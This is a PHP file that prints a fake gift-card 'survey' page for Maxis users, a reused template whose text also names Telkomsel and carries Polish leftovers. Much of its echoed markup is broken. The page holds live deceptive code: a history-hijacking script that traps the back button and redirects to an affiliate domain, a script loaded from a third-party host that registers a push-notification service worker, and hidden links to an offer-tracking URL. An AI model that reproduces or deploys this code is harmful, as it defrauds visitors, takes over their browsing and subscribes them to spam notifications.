<?php
echo "<!DOCTYPE html><html class=\"no-js\" lang=\"en\" slick-uniqueid=\"3\"><head>\n";
echo "meta charset=\"utf-8\">\n";
echo "meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n";
echo "meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n";
echo "meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\">\n";
echo "script language=\"javascript\" type=\"text/javascript\" src=\"a11853068a3860cdf5f5d121612a41af.static.js\"></script>\n";
echo "script language=\"javascript\" type=\"text/javascript\" src=\"25b11e27a2475b327e05fafac6435322.static.js\"></script>\n";
echo "<title>Exclusive Grab Gift Card for Maxis Users</title>\n";
echo "<link rel=\"stylesheet\" href=\"5f9d7b326c53880762ef44396c52ea33.static.css\">\n";
echo "link href=\"Fauna+One.css\" rel=\"stylesheet\" type=\"text/css\">\n";
echo "link href=\"Chewy.css\" rel=\"stylesheet\" type=\"text/css\">\n";
echo "link rel=\"stylesheet\" type=\"text/css\" href=\"ad14e554cec2062293d6d1eb476f0335.static.css\">\n";
echo "link rel=\"stylesheet\" href=\"froala_style.min.css\"></head>\n";
echo "body>\n";
echo "div class=\"row\">\n";
echo "div id=\"pageheader\">\n";
echo "div id=\"header_imagefield\"> </div>\n";
echo "/div>\n";
echo "/div>\n";
echo "div class=\"row clearfix centerdata\" id=\"allcontent\">\n";
echo "div class=\"medium-12 columns\" id=\"content_box_left\">\n";
echo "   <p class=\"top\" align=\"center\">\n";
echo "       <b>Telkomsel users!<br>\n";
echo "       Grab your chance to win a GrabGifts gift card！\n";
echo "   </p>\n";
echo "   </div>\n";
echo "div class=\"clearfix\" id=\"content_box_right\" style=\"text-align:center!important;\" align=\"center\"> <img id=\"img_prize\" src=\"grabgifts-malaysia.webp\" alt=\"Kupon na zakupy w Lidlu\"> </div>\n";
echo "div class=\"medium-12 columns\" id=\"questionfield\">\n";
echo "div id=\"questions\">\n";
echo "<h2 id=\"question_headline\"> Question <span id=\"min_number\">1</span> z <span id=\"max_number\">4</span> </h2>\n";
echo "\n";
echo "div class=\"questionblock\" id=\"question_0\">\n";
echo "h3>You are...</h3>\n";
echo "a class=\"button\"> <span>MAN</span> </a> <a class=\"button\"> <span>WOMEN</span> </a> </div>\n";
echo "\n";
echo "div class=\"questionblock hidden\" id=\"question_1\" style=\"opacity: 0; visibility: hidden;\">\n";
echo "h3>How old are you?</h3>\n";
echo "a class=\"button\">\n";
echo "span>18-29</span>\n";
echo "/a>\n";
echo "a class=\"button\">\n";
echo "span>30-39</span>\n";
echo "/a>\n";
echo "br>\n";
echo "a class=\"button\">\n";
echo "span>40-49</span>\n";
echo "/a>\n";
echo "a class=\"button\">\n";
echo "span>50+</span>\n";
echo "/a>\n";
echo "/div>\n";
echo "\n";
echo "<div class=\"questionblock hidden\" id=\"question_2\" style=\"opacity: 0; visibility: hidden;\">\n";
echo "h3>Are things really expensive here now?</h3>\n";
echo "a class=\"button\">\n";
echo "span>Yes</span>\n";
echo "/a>\n";
echo "a class=\"button\">\n";
echo "span>No</span>\n";
echo "/a>\n";
echo "/div>\n";
echo "<div class=\"questionblock hidden\" id=\"question_3\" style=\"opacity: 0; visibility: hidden;\">\n";
echo "h3>Are you satisfied with Maxis's 4G/5G speed? </h3>\n";
echo "a class=\"button\">\n";
echo "span>Satisfied</span>\n";
echo "/a>\n";
echo "a class=\"button\">\n";
echo "span>Dissatisfied</span>\n";
echo "/a>\n";
echo "!-- <br>\n";
echo "a class=\"button\">\n";
echo "span>accept it</span>\n";
echo "/a>\n";
echo "a class=\"button\">\n";
echo "span>Inne</span>\n";
echo "/a> -->\n";
echo "\n";
echo "/div>\n";
echo "</div>\n";
echo "<div id=\"page_prozess\" class=\"hidden\">\n";
echo "div class=\"prozess\">\n";
echo "   <p id=\"prozess_status_1\" class=\"prozess_status\"> <strong>Thank you! You will now be redirected to the rewards page....</strong> </p>\n";
echo "   <p id=\"prozess_status_2\" class=\"prozess_status hidden\"> <strong>Analyzing results...</strong> </p>\n";
echo "   <p id=\"prozess_status_3\" class=\"prozess_status hidden\"> <strong>Thank you! You will now be redirected to the rewards page...</strong><br> </p>\n";
echo "   </div>\n";
echo "div class=\"prozess_bar\"></div>\n";
echo "/div>\n";
echo "div id=\"page_prize\" class=\"hidden\"> </div>\n";
echo "<!-- YOUR DYNAMIC LINK (DO NOT DELETE) -->\n";
echo "a id=\"target_link\" class=\"hidden target_url\" href=\"https://innovate-niche.com/chv3l3k.php?lp=1\"> </a>\n";
echo "!-- end of YOUR DYNAMIC LINK (DO NOT DELETE)  -->\n";
echo "</div>\n";
echo "/div>\n";
echo "script>\n";
echo "   (function(window, location) {\n";
echo "   history.replaceState(null, document.title, location.pathname+\"#!/history\");\n";
echo "   history.pushState(null, document.title, location.pathname);\n";
echo "   \n";
echo "   window.addEventListener(\"popstate\", function() {\n";
echo "     if(location.hash === \"#!/history\") {\n";
echo "       history.replaceState(null, document.title, location.pathname);\n";
echo "       setTimeout(function(){\n";
echo "         location.replace(\"http://lp.innovate-niche.com/input-BBR/index.html?key=ybzoy66mivk27imho24y&c1=BBR&c2=ID\");\n";
echo "       },0);\n";
echo "     }\n";
echo "   }, false);\n";
echo "   }(window, location));\n";
echo "   </script>\n";
echo "   <script>\n";
echo "       var s = document.createElement('script');\n";
echo "       s.src='//deehalig.net/act/files/micro.tag.min.js?z=5705526&sw=/sw-check-permissions-9098f.js';\n";
echo "       s.onload = function(result) {\n";
echo "           switch (result) {\n";
echo "               case 'onPermissionDefault':break;\n";
echo "               case 'onPermissionAllowed':break;\n";
echo "               case 'onPermissionDenied':break;\n";
echo "               case 'onAlreadySubscribed':break;\n";
echo "               case 'onNotificationUnsupported':break;\n";
echo "           }\n";
echo "       };\n";
echo "       document.head.appendChild(s);\n";
echo "   </script> \n";
echo "!-- REDIRECTING SCRIPT -->\n";
echo "!-- <script type=\"text/javascript\">\n";
echo "   var get_url_parameters = function (target_id) {\n";
echo "       if (window.location.search && ($(target_id) || $$('.' + target_id).length > 0)) {\n";
echo "           var para = window.location.search;\n";
echo "           if (window.location.search[0] == '?') {\n";
echo "               para = para.substring(1, para.lenght);\n";
echo "           }\n";
echo "           if ($$('.' + target_id).length > 0) {\n";
echo "               $$('.' + target_id).each(function (elment, index) {\n";
echo "                   var href = $$('.' + target_id)[index].href;\n";
echo "                   if (href.test(/\\?$/) == true || href.test(/&$/) == true) {\n";
echo "                       href = href + para;\n";
echo "                   } else if (href.test(/\\/$/) == true) {\n";
echo "                       href = href + '?' + para;\n";
echo "                   } else {\n";
echo "                       href = href + '&' + para;\n";
echo "                   }\n";
echo "                   $$('.' + target_id)[index].href = href;\n";
echo "               });\n";
echo "           }\n";
echo "           if ($(target_id)) {\n";
echo "               var href = $(target_id).href;\n";
echo "               if (href.test(/\\?$/) == true || href.test(/&$/) == true) {\n";
echo "                   href = href + para;\n";
echo "               } else if (href.test(/\\/$/) == true) {\n";
echo "                   href = href + '?' + para;\n";
echo "               } else {\n";
echo "                   href = href + '&' + para;\n";
echo "               }\n";
echo "               // $(target_id).href = href;\n";
echo "               $(target_id).href = 'https://innovate-niche.com/chv3l3k.php?lp=1';\n";
echo "           }\n";
echo "        }\n";
echo "   }\n";
echo "   window.addEvent('domready', function () {\n";
echo "       get_url_parameters('target_link');\n";
echo "   });\n";
echo "/script> -->\n";
echo "!-- REDIRECTING SCRIPT -->\n";
echo "\n";
echo "/body></html>\n";
?>